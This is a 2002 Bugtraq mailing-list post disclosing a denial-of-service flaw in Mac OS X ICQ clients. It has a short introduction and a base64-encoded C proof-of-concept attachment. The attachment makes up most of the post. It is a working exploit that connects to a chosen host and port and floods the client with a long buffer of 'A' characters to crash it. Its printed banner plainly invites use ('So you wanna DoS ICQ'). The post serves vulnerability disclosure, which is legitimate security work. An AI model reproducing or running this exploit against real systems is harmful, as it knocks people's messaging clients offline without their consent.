[24117] in bugtraq
OSX ICQ DoS
daemon@ATHENA.MIT.EDU (Stephen)
Tue Feb 5 13:05:59 2002
Date: Tue, 5 Feb 2002 11:00:45 -0500 (EST)
From: Stephen <sa7ori@tasam.com>
To: bugtraq@securityfocus.com
Message-ID: <20020205104938.U73726-200000@tasam.com>
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="0-1297166189-1012924845=:77895"
--0-1297166189-1012924845=:77895
Content-Type: TEXT/PLAIN; charset=US-ASCII
Hello,
I looked a bit for this problem on the web, and cant find it so
I am posting it here. Yeah, so its a lame DoS for several versions of
OSX's ICQ clients. Version information is in the comment space of the
proof of concept exploit code I have included below. This was a quick
hack based on some code I authored that exploited a similar problem with
some earlier versions of Licq. I was learning basic socket coding at the
time I wrote the Licq thingy, but nonetheless here is the code that works
on ICQ MacOSX Ver 2.6x Beta Build 7 and others.
--0-1297166189-1012924845=:77895
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="osxicq.c"
Content-Transfer-Encoding: BASE64
Content-ID: <20020205110045.P77895@tasam.com>
Content-Description: osxicq dos proof
Content-Disposition: attachment; filename="osxicq.c"
LyoNCiAqIE9TWCBJQ1EgRG9zLiBzYTdvcmlAdGFzYW0uY29tDQogKiBQcm9v
ZiBvZiBjb25jZXB0LiBXb3JrZWQgb24gZWFybHkgdmVyc2lvbnMgb2YgTGlj
cS4gTm93IGl0IGFwcGFyZW50bHkgd29ya3MNCiAqIGZvciB2YXJpb3VzIHZl
cnNpb25zIG9mIE9TWCBJQ1EgY2xpZW50cy4NCiAqIFRlc3RlZCBhbmQgd29y
a3Mgb246IElDUSBNYWNPU1ggVmVyIDIuNnggQmV0YSBCdWlsZCA3DQogKiBh
bmQgc2V2ZXJhbCBvdGhlcnMuDQogKi8NCg0KI2luY2x1ZGUgPG5ldGRiLmg+
DQojaW5jbHVkZSA8bmV0aW5ldC9pbi5oPg0KI2luY2x1ZGUgPHN5cy90eXBl
cy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzdGRp
by5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPHN0cmluZy5o
Pg0KI2luY2x1ZGUgPGVycm5vLmg+DQoNCmludCBtYWluKGludCBhcmdjLCBj
aGFyICoqYXJndil7DQogIGNoYXIgYnVmWzE5MDAwXTsgaW50IGksIHNvY2ss
IHJlc3VsdDsgc3RydWN0IHNvY2thZGRyX2luIHNpbjsgc3RydWN0IGhvc3Rl
bnQgKmdvdGhvc3Q7DQogIHByaW50ZigiU28geW91IHdhbm5hIERvUyBJQ1Eu
Li5cbiBzYTdvcmlAdGFzYW0uY29tXG5CUkFBQUFBWklJSUlJSUlMXG4iKTsN
CiAgaWYgKGFyZ2MgPCAzKSB7DQogICAgICBmcHJpbnRmKHN0ZGVyciwgIlVz
YWdlOiAlcyA8aWNxY2xpZW50PiA8cG9ydD5cbmplZXouIGdldCBpdCByaWdo
dC5cbiIsIGFyZ3ZbMF0pOw0KICAgICAgZXhpdCgtMSk7DQogICAgfQ0KICBn
b3Rob3N0ID0gZ2V0aG9zdGJ5bmFtZShhcmd2WzFdKTsNCiAgaWYgKCFnb3Ro
b3N0KXsNCiAgICAgIGZwcmludGYoc3RkZXJyLCAiJXM6IEhvc3QgcmVzb2x2
IGZhaWxlZC4gVGFyZC5cbiIsIGFyZ3ZbMV0pOw0KICAgICAgZXhpdCgtMSk7
DQogICAgfQ0KICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7IHNpbi5zaW5f
cG9ydCA9IGh0b25zKGF0b2koYXJndlsyXSkpOw0KICBzaW4uc2luX2FkZHIg
PSAqKHN0cnVjdCBpbl9hZGRyICopZ290aG9zdC0+aF9hZGRyOyBzb2NrID0g
c29ja2V0KEFGX0lORVQsIFNPQ0tfU1RSRUFNLCAwKTsNCiAgcmVzdWx0ID0g
Y29ubmVjdChzb2NrLCAoc3RydWN0IHNvY2thZGRyICopJnNpbiwgc2l6ZW9m
KHN0cnVjdCBzb2NrYWRkcl9pbikpOw0KICBpZiAocmVzdWx0ICE9IDApIHsN
CiAgICAgIGZwcmludGYoc3RkZXJyLCAiQ29ubmVjdCBGYWlsZWQuIHJlVGFy
ZC4gJXNcbiIsIGFyZ3ZbMV0pOw0KICAgICAgZXhpdCgtMSk7DQogICAgfQ0K
ICBpZiAoc29jayA8IDApew0KICAgICAgZnByaW50ZihzdGRlcnIsICJFcnJv
ciBpbiBzb2NrZXQuIik7DQogICAgICBleGl0KC0xKTsNCiAgICB9DQogIGZv
ciAoaT0wOyBpPDE5MDAwOyBpKyspIC8qIHNlbmQgbG9vcCBzaGFib2luZyBi
b2luZyBib2luZyAqLw0KICAgIHN0cm5jYXQoYnVmLCAiQSIsIDEpOw0KICBz
ZW5kKHNvY2ssIGJ1Ziwgc2l6ZW9mKGJ1ZiksIDApOw0KICBjbG9zZShzb2Nr
KTsNCiAgZnByaW50ZihzdGRvdXQsICJTaGlucnl1SGFkb2tlblxuLi5BbmQg
YW4gYW5ncnkgZmx1cnJ5IG9mIEFzIGZsaWVzIGZyb20geW91ciBvdXRzdHJl
YWNoZWQgaGFuZC4gaGVoLlxuXG4iKTsNCn0NCg==
--0-1297166189-1012924845=:77895--
